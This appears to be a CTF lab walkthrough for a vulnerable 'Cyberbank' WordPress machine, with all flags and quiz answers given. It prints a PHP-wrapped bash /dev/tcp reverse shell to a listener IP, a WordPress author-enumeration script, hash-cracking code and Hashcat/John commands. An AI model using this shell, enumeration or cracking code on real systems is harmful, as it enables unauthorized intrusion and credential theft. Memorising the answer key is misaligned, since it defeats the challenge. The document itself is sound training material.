CTF Solving Machine – Assessment

Title: CTF Challenge – Get the Bank Website access and then Get Root access

Context:
Perform a penetration test on a finance company known as “Cyberbank”. It is a
beginner-to-intermediate level room that teaches web application testing and
how to gain system access from the web portal.

Short Description:
I built this machine as a full website-hacking exercise: each challenge solved
reveals the next hint, until the student gains root access on the running web
server. Your target is to reach the root user via privilege escalation.

Learning Skills:
Web security, manual pentesting, Burp Suite, brute-force attacks, hashing,
steganography, WordPress hacking and Linux privilege escalation.

Instruction:
We provide one Ubuntu OS machine; import it into VirtualBox and the lab setup
is done. Then find the IP address of the virtual machine and perform the
tasks stated below.

Prerequisites:
https://portswigger.net/burp/documentation/desktop/tutorials
https://redtm.com/privilege-escalation/linux-privilege-escalation-cheat-sheet/
https://www.edureka.co/blog/steganography-tutorial

Tasks with Walkthrough Solution:

Task -1 Deploy the Machine
You can connect over the TryHackMe VPN and perform the testing from your own
Kali OS / Parrot OS
Or
You can use the AttackBox on the TryHackMe portal

Task-2 Information gathering and Scanning
Once the machine is ready,
we check the target IP address and note it.
In my case it was – 192.168.153.136
and the attacker OS – 192.168.153.129

Questions -1
Which two port numbers are open on Target Machine?
Answer: 22,80

Questions-2
Which txt file lists 10 Disallow entries?
Answer: robots.txt

Questions -3
What is the title of the website shown by an aggressive Nmap scan?
Answer: CYBER BANK
Hint: #nmap -A -T5 -vvv 10.x.x.x

Questions -4
Can we collect any user information by running a user enumeration technique
against the target machine? (Yay/Nah)
Answer: Nah

Task-3 Recon the Website
Here you have to perform recon techniques on the website running on port
80.
Questions -1
Which agency built the website theme?
Answer: Themeansar

Questions -2
Can you find the Flag-0, while exploring the website?
Answer: THM{N00B_E#D_FL@G-0}

Questions -3
Which hash value did you find while recovering the admin password?
Answer:
7f18e6f5753603b031a471802dfdfb52a93d531c54a24c191f832e57cfe6784c
Hint: Check the CB logo and extract the hidden data with the “steghide” tool
to get the hash

Questions -4
What is the admin password? Explore the About Us page and decode the image
to get the admin password.
Answer: I_will_n3v3r_F0rg3t
Hint: Extract the s3c***.txt file and crack its contents using the password
list given in the task files
Get the password list from here: https://github.com/mukesh420/cyber_bank

Save this image and then extract the hidden data with the Steghide tool. There
is a twist here: when we try to extract, it asks for a passphrase.
So read the instructions given in the left-hand content of the About Us section.

Here is how you can tell the image is not an ordinary image: when we run the
“exif” utility it reports that no EXIF data is present and the data looks
corrupted, while the “file” utility still reports the saved file as a valid
image. Missing EXIF data on its own does not prove anything is hidden, but it
is a hint worth following up.
Now try to extract with Steghide; it asks for a passphrase, so check the
source code of the page.

Don't be misled by the password “PAssWord!” shown on the page: the sentence
in the HTML comment tells you the real passphrase is simply “password”.
Use this passphrase to extract the hidden data from the image.

Here we can see that a file named “s3cr3t.txt” is hidden inside the image;
we extract it with the passphrase: password

At last we have the hidden data.
Now we need to decode it, as it looks like a base64-encoded value.
So we use the “base64” utility to decode it, and we find the hash value
“7f18e6f5753603b031a471802dfdfb52a93d531c54a24c191f832e57cfe6784c”

Now, to recover the password behind this hash, we use the password list I
provided together with the John tool.

Download the provided password wordlist and use John to crack the SHA-256
hash we found (64 hex characters is the length of an unsalted SHA-256 digest).
Alternatively, you can also try Hashcat if John does not work properly:
#hashcat -a 0 -m 1400 hash.txt pass.txt
Here hash.txt holds the hash and pass.txt is the provided wordlist, which
Hashcat tries one word at a time to recover the admin password.

That completes this task; in the next one we hunt for FLAG 1.
Task-4 Manual Exploration – Try Hard
Having explored the About Us page, we now move on to the blog post pages and
search for the new FLAG-1.
Question-1
Can you find the Flag, while exploring the website? {FLAG-1}
Answer: THM{P@GE_C0NT3NT_FL@G-1}
We found the flag in the blog post “Working Together to Make Investments
Successful”.

Question-2
Can you find the Admin Email ID?
Answer: [email protected]

Questions -3
Can you find the Flag, while exploring the website? {FLAG-2}
Answer: THM{GR@B_ADM!M_FL@G-2}

Here we got a hint about the admin user: check the author name shown on each
blog post on the site.
We now know the website is built on the WordPress CMS, so we need to find the
admin login page. The default is /wp-admin/, but when we try it we are
redirected to the main page because a firewall blocks it. The hint also tells
us to look for a file whose name is based on “login”.
We could use a directory brute-forcing tool to find it, but the room says to
take a manual approach rather than going straight to an automated tool. So
take the word “login” and try it with the different file extensions a web
page might use.
We find it at “/wp-admin/login.php”. Again, check the source code of this
page.

Question-4
Can you find the Flag, while exploring the website URL directories? {FLAG-3}
Answer: THM{L0GIN_F0UND_FL@G-3}

While exploring you will see the “/?author=” link whenever you view another
author's information from the blog page.

Check the URL: the author information changes when you change the number, so
walk through the IDs to find the real admin username. WordPress answers
“/?author=N” with a redirect to “/author/<slug>/”; the slug is the user's
nicename, which normally matches the login name but can differ.

With a little more research we also found the WordPress login page at
“/?login”.
Question-5
Find the Admin Username?
Answer: D0n_tCry
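The “/?author=” walk described above, written out as an added Python example (it is not part of the room or of this write-up). It requests each author ID without following redirects and reads the username out of the Location header. The fetch callback is injectable so the same logic runs offline: fake_site and the hostname cyberbank.example are constructed stand-ins for the target, and http_fetch is the live version to swap in against the real machine.

```python
import http.client
import re
import urllib.parse
from typing import Callable, Dict, Optional, Tuple

# A fetch callback takes a URL and returns (status code, response headers).
Fetch = Callable[[str], Tuple[int, Dict[str, str]]]

# WordPress answers /?author=N for an existing user ID with a redirect to
# /author/<user_nicename>/ ; the nicename is the last path segment.
AUTHOR_SLUG = re.compile(r"/author/([^/?#]+)/?")


def username_from_location(location: Optional[str]) -> Optional[str]:
    """Pull the author slug out of a Location header (absolute or relative URL)."""
    if not location:
        return None
    match = AUTHOR_SLUG.search(location)
    return match.group(1) if match else None


def http_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    """Live fetch that does NOT follow redirects, so the Location header stays visible."""
    parts = urllib.parse.urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=10)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("GET", path, headers={"User-Agent": "wp-author-enum"})
    resp = conn.getresponse()
    headers = {name.title(): value for name, value in resp.getheaders()}
    resp.read()
    conn.close()
    return resp.status, headers


def enumerate_authors(fetch: Fetch, base_url: str, max_id: int = 10) -> Dict[int, str]:
    """Walk /?author=1..max_id and collect the IDs that redirect to an author archive."""
    found: Dict[int, str] = {}
    for author_id in range(1, max_id + 1):
        status, headers = fetch(f"{base_url.rstrip('/')}/?author={author_id}")
        if status in (301, 302):
            user = username_from_location(headers.get("Location"))
            if user:
                found[author_id] = user
    return found


def fake_site(users: Dict[int, str]) -> Fetch:
    """Constructed stand-in for the target: redirects like WordPress for known IDs, 404 otherwise."""
    def fetch(url: str) -> Tuple[int, Dict[str, str]]:
        query = urllib.parse.urlsplit(url).query
        author_id = int(urllib.parse.parse_qs(query).get("author", ["0"])[0])
        if author_id in users:
            # The hostname is made up for this example.
            return 301, {"Location": f"http://cyberbank.example/author/{users[author_id]}/"}
        return 404, {}
    return fetch


if __name__ == "__main__":
    # Offline demo against the constructed site; pass http_fetch and the real
    # target URL instead to run it live.
    demo = fake_site({1: "D0n_tCry", 3: "editor"})
    print(enumerate_authors(demo, "http://cyberbank.example", max_id=5))
```

If a security plugin or firewall blocks the redirect, enumerate_authors simply returns an empty dict; in that case fall back to the author names shown on the blog posts, as the room's hint suggests.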

Task-5 Get the Root Access
Now we have found the username and password for the WordPress admin panel,
also we
Questions-1
Did you upload the reverse shell in Admin Panel? (Yay/Nay)
Answer: Yay
Now comes the crucial part: we need to log in and get a reverse shell on the
machine.
There are various shells available; one well-known option is the Pentest
Monkey PHP reverse shell.

Here I use this bash /dev/tcp reverse shell wrapped in PHP as the file to
upload (note the IP below differs from the attacker IP noted in Task 2; use
the IP your listener actually runs on):
<?php
// Spawn an interactive bash session that connects back to the attacker's listener.
// Replace the IP and port with your own listener's address and port.
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.128/8080 0>&1'");
?>

Replace the IP address with your attacker machine (Kali) IP address to
receive the reverse shell connection.

When you upload the shell in the Plugins section it shows an error saying the
file was not uploaded, or some other issue. Don't worry about that; check the
Media section, where the file has already been uploaded.

Here you can see the error I got during the upload.

Here we see the file was uploaded even though the error appeared.

Now click on the file and you can see the URL we need to request to trigger
the reverse connection.

Copy the file URL and open it in a new browser tab to run it.
But before running it, start a Netcat listener on your attacker/Kali machine
on the port used in the shell (8080 here).

Now we request the file URL, and boom, we have a reverse shell on the machine.

Now let's dig for the root flag.

Once in, I explored other directories and found the /run directory, which
holds a secret hash and a password list.

Question-2
Where you found the password list, tell the directory name?
Answer: /run

Now we copy both files to the Kali/attacker machine and crack the hash to
get the password.

8420aee0fa9cea0326c166bd9f903eeab3fdfa5b
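The cracking step used here, and earlier for the admin's SHA-256 hash in Task 3, is the same unsalted dictionary attack that John and Hashcat perform. The Python below is an added example (not part of the room or of this write-up) that shows the whole chain: decode the base64 wrapper from s3cr3t.txt, guess the algorithm from the digest length (64 hex characters for SHA-256, 40 for SHA-1), and try every line of the wordlist. The sample password “Wint3r-Vault”, the wordlist entries and the helper names are constructed for the example; to run it against the room, feed it the real hash and pass.txt.

```python
import base64
import hashlib
from typing import Iterable, Optional

# Hex-digest length -> hashlib algorithm, for the unsalted hashes this room hands out
# (SHA-256 for the web admin, SHA-1 for the hash in /run). MD5 added for completeness.
HASH_TYPES = {64: "sha256", 40: "sha1", 32: "md5"}


def detect_hash_type(hexdigest: str) -> str:
    """Guess the algorithm from the digest length; only meaningful for unsalted hex digests."""
    if not hexdigest or any(c not in "0123456789abcdef" for c in hexdigest):
        raise ValueError("not a hex digest: %r" % hexdigest)
    try:
        return HASH_TYPES[len(hexdigest)]
    except KeyError:
        raise ValueError("unsupported digest length %d" % len(hexdigest)) from None


def decode_secret(blob: str) -> str:
    """Decode the base64 text from s3cr3t.txt into the hex digest it carries."""
    digest = base64.b64decode(blob.strip(), validate=True).decode("ascii").strip().lower()
    detect_hash_type(digest)  # fail early if the decoded text is not a digest we recognise
    return digest


def wrap_secret(hexdigest: str) -> str:
    """Inverse of decode_secret: base64-wrap a digest the way s3cr3t.txt does (for demos)."""
    return base64.b64encode(hexdigest.encode("ascii")).decode("ascii")


def hash_word(word: str, algo: str) -> str:
    """Hex digest of one candidate password under the given hashlib algorithm."""
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def crack_hash(hexdigest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose digest matches, else None."""
    target = hexdigest.strip().lower()
    algo = detect_hash_type(target)
    for line in wordlist:
        candidate = line.rstrip("\r\n")  # wordlist lines usually carry their newline
        if hash_word(candidate, algo) == target:
            return candidate
    return None


def crack_file(hash_path: str, wordlist_path: str) -> Optional[str]:
    """Same attack driven from files, e.g. the hash and list copied out of /run."""
    with open(hash_path, encoding="ascii") as f:
        target = f.read().strip()
    with open(wordlist_path, encoding="utf-8", errors="replace") as words:
        return crack_hash(target, words)


if __name__ == "__main__":
    # Constructed sample: a made-up password, hashed and base64-wrapped the way
    # s3cr3t.txt wraps the real one, then cracked with a tiny made-up wordlist.
    sample_password = "Wint3r-Vault"
    secret_txt = wrap_secret(hash_word(sample_password, "sha256"))
    digest = decode_secret(secret_txt)
    print(detect_hash_type(digest), crack_hash(digest, ["letmein", "password", sample_password]))
```

The equivalent John invocations are john --format=raw-sha256 --wordlist=pass.txt hash.txt for the admin hash and --format=raw-sha1 for the one from /run; in Hashcat the SHA-1 mode is -m 100 where the walkthrough used -m 1400 for SHA-256. Length-based detection is only a guess: a 40-character string could also be a salted or truncated digest, which this attack would never crack.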

When I visit the /home directory, I see a user named “ineuron”, and checking
the /etc/passwd file suggests the ineuron user has admin rights (note that
/etc/passwd only lists accounts; actual sudo rights are visible in /etc/group
or with sudo -l once logged in).
Questions-3
Which user password you have cracked?
Answer: ineuron

Question-4
Did you reach near Root user access? (Yay/Nay)
Answer: Yay

Here we found the next answer too.

We log in as the ineuron user with the password we cracked.
Now we use a Python one-liner to spawn an interactive shell so the root folder
can be viewed properly:

#python3 -c 'import os; os.system("/bin/sh")'

Then we find the hIdd3n folder containing one secret key.
That's our flag, and it is ROT13-encoded (a simple letter rotation, not real
encryption), so we just need to decode it. Tada, we have the last flag too.
Question-5
What algorithm the Flag is Encrypted?
Answer: ROT13

Here we got the flag:

Questions-6
Provide the Final Root Flag? {FLAG-4}
Answer: THM{G3T_R00T_@CC3$$_FL@G-4}
Thanks for being patient! I hope you liked the room's challenges. Thank you
once again for solving it with me!
